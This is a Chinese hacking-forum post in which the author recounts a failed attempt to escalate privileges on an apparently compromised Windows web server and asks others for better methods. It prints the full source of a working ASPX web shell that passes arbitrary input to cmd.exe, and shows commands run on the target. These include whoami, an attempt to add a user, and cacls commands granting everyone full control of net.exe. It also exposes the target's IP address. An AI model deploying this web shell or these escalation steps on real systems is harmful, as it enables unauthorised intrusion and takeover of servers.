- 帖子
- 86
- 积分
- 297
- 威望
- 343
- 金钱
- 298
- 在线时间
- 41 小时
|
本人失败的提权过程...都写出来了...希望哪位大牛一起来交流下...
wscript.shell √ 命令行执行组件 组建没被删...
自己上传了个CMD.exe 输入路径 但是都是没有权限.换了几个路径都一样
上传了个ASPX马 支持ASPX 但是没办法跳目录..
CMD.ASPX
代码如下
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
string item = cmd.Text;
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
string strOutput = null;
p.Start();
p.StandardInput.WriteLine(item);
p.StandardInput.WriteLine("exit");
strOutput = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>");
Response.Write(strOutput);
Response.Write("</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
}
</script>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:\" /><asp:Button id="btn"
runat="server" Text="execute" />
</form>
访问出错了...
接着换了个调用CMD.EXE执行命令的ASPX马
可以执行命令...
除了DIR 什么也执行不了 net net1 ipconfig netstat....都一样
所以自己上传了个NET.EXE和IPCONFIG.EXE NETSTAT.EXE
执行whoami
nt authority\network service
NET.EXE不能执行 其余的2个都能正常执行
还有一个麻烦的事
有一流监控
一流信息监控拦截系统提醒您:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词或
者您的IP受到了访问限制,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任
何违反国家规定的内容!本次拦截的相关信息为:
最开始也看了下FTP
Connected to 60.191.248.113.
220 Microsoft FTP Service
User (60.191.248.113:(none)):
这个没办法利用吧...
试了写个批处理和VBS
直接在CMD里执行 都执行不了
传了个狼牙写的无NET加用户
也加不上
dir C:\
发现有perl目录
记得看过利用perl来提权的教程..
但是后来发现里面是个空文件夹
perl提生权限..失败..
后来又试了下CACLS 想改变下目录的访问权限
输入
/c c:\var\cacls.exe C:\windows\system32\net.exe /t /e /c /g everyone:f
被拦截了
/c c:\var\cacls C:\windows\system32\net.exe /t /e /c /g everyone:f
成功执行
ACCESS_DENIED: C:\windows\system32\net.exe
试了下
/c C:\windows\system32\net.exe user
结果还是没有半点回显
又试了下
/C c:\var\cacls C:\windows\system32\net2.exe /t /e /c /g everyone:f
没回显
那NET.EXE应该是存在才对的啊
但是为什么还是没办法呢
所以又去百度了下..
在一帖子中看到有人说运行CACLS得系统权限
也有人说回显是假的...一阵狂晕啊
因为没有利用CACLS提权过 所以不知道是真是假...
帖子地址:
http://bbs.hackerxfiles.net/thread-90266-1-1.html
哪位知道怎么用CACLS来提权?该怎么提..需要什么权限?
或者还有什么别的提权方法...
说得够详细了吧 还有 上面有哪些地方错了 希望能指点下..因为本人提权很烂..希望能多学些提权方法..呵呵...
大牛们一起来讨论下吧... |
|